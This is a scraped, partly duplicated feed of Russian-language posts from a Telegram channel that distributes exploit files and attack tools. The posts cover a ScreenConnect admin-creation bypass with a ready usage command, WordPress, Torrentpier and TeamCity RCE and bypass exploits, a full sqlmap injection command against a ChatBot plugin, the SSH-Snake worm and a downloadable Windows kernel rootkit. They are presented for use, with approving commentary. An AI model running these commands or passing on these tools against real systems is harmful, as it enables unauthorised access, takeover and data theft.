Proxy Bar
Beeline потёк
Все эти билайны и теле2 это только верхушка айсберга и перерастает в шпионский треш, да еще и очень быстро.
Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.
Ноги выросли отсюда I-S00N
В общем китайский APT-подрядчик нормально так накинул на вентилятор, от
В общем будет интересно, читаем вникаем дальше
*
Ну и да, кого в Китае расстреляют
UPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)
#APT
Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.
Ноги выросли отсюда I-S00N
В общем китайский APT-подрядчик нормально так накинул на вентилятор, от
iOS Spyware до физических имплантируемых устройств.В общем будет интересно, читаем вникаем дальше
*
Ну и да, кого в Китае расстреляют
UPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)
#APT
👍26
Побег из VirtualBox 7.0.10
ДЫрки в
Почитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100
*
exploit
#virtualbox #escape
ДЫрки в
virtio-netПочитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100
*
exploit
#virtualbox #escape
🔥27😱6👌3👍1
watchtowr-vs-ConnectWise_2024-02-21.py
2.6 KB
ScreenConnect POC
*
Обход аутентификации для добавления нового пользователя-администратора в
*
Usage:
*
*
Обход аутентификации для добавления нового пользователя-администратора в
ConnectWise ScreenConnect.*
Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!*
👍17🔥7👌2
exploit.py
6.2 KB
CVE-2024-25600 wordpress Exploit (RCE)
*
Дыра в плагине
*
requirements:
*
#RCE #wordpress
*
Дыра в плагине
Bricks Builder*
requirements:
alive_progress
bs4
prompt_toolkit
requests
rich*
#RCE #wordpress
🔥21👍4👌3
ChatBot для WordPress
*
SQL-инъекция через параметр $strid в версии до 4.8.9 включительно
*
ТЫКНУТЬ
а я споть
*
SQL-инъекция через параметр $strid в версии до 4.8.9 включительно
*
ТЫКНУТЬ
python3 sqlmap.py -u 'http://OLOLO.ru:80/wp-admin/admin-ajax.php' --data='action=wpbo_search_response&name=test&keyword=test&strid=1' --level 4 --risk 3 --dbms mysql --banner -p stridа я споть
👍31🔥12😱4👌4
SSH-Snake Tool for ....lulz
*
Это идеальное сочетание лени, глупости и божьей искры )))
То есть чуваки написали утилиту на базе ssh для КАРТОГРАФИРОВАНИЯ локалки, бегает с закрытыми ключами и бед не знает.
Ну не удивительно что черные шляпы мигом взяли на вооружение 😆
Правильное название должно быть
ТДН во все поля )
*
SSH-Snake
*
Почитать
#worm #ssh
*
Это идеальное сочетание лени, глупости и божьей искры )))
То есть чуваки написали утилиту на базе ssh для КАРТОГРАФИРОВАНИЯ локалки, бегает с закрытыми ключами и бед не знает.
Ну не удивительно что черные шляпы мигом взяли на вооружение 😆
Правильное название должно быть
ssh-wormТДН во все поля )
*
SSH-Snake
*
Почитать
#worm #ssh
🔥19👍5👌1
2024-1651_exploit.py
4.6 KB
CVE-2024-1651 exploit (RCE)
*
Дырка в
#exploit #rce #linux
*
Дырка в
Torrentpier v2.4.1, приложение уязвимо к небезопасной десериализации, поэтому - позволяет выполнять произвольные команды на сервере.#exploit #rce #linux
🔥10👍4
Banshee
*
*
Умеет:
- Kill processes
- Change protection levels
- Elevate any process token to SYSTEM
- Enumerating and erasing kernel callbacks
- Protecting the driver file
- Hide Process by PID
*
TODO list - обещает интересное расширение функционала
*
download win_rootkit
#win #rootkit
*
Windows x64 Kernel Rootkit (Experimental)
*
Умеет:
- Kill processes
- Change protection levels
- Elevate any process token to SYSTEM
- Enumerating and erasing kernel callbacks
- Protecting the driver file
- Hide Process by PID
*
TODO list - обещает интересное расширение функционала
*
download win_rootkit
#win #rootkit
👍16🔥5
CVE-2024-27198.py
2.2 KB
CVE-2024-27198
обход аутентификации с использованием уязвимости альтернативного пути в JetBrains
*
#jets
обход аутентификации с использованием уязвимости альтернативного пути в JetBrains
TeamCity Server*
#jets
🔥9👍6